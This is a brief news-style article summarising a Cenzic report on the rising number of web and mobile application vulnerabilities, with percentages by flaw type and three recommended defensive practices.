Security is getting stronger, but attacks and vulnerabilities are even stronger.
In the world of BYOD, cloud services and mobile applications, and company’s failure to detect and address exploits around information leakage, authentication and authorization, and session management, vulnerabilities are everywhere. The median number of vulnerabilities per application, now at 14, is greater than it was in the previous year, which was 13, according to a new report by web application security solutions firm, Cenzic.
The report revealed a wide range of findings regarding application vulnerabilities including:
• Steady growth in the incidence of security flaws in mobile applications. The report found privacy violation and excessive privileges appear in over 80 percent of mobile applications.
• Increasing incidences of vulnerabilities found in applications shared with third parties. Cloud services providers and supply chain partners that may be outside the organization’s sphere of influence are a major source of threats today.
• Information leakage comes from vulnerable applications. Around 23 percent of vulnerabilities related to information leakage, in which an application inappropriately discloses sensitive data, such as technical details of the application or user-specific data.
• The age-old problem of Cross-Site Scripting (XSS) is still to blame. Twenty-five percent of vulnerabilities related to cross-site scripting (XSS), in which an application allows attackers to send malicious scripts by relaying the script from an otherwise trusted URL.
• Mixed vulnerabilities in other areas are not going away. Flaws in authentication or authorization made up 15 percent of vulnerabilities, and session management errors accounted for 13 percent.
The catch is quite a few of today’s vulnerabilities are preventable.
Cenzic outlined key best practices to remind enterprises of some simple solutions that can help secure their applications:
1. Implement Safe Coding Practices
2. Use Web Application Firewalls (WAFs)
3. Ensure Proper Server Configurations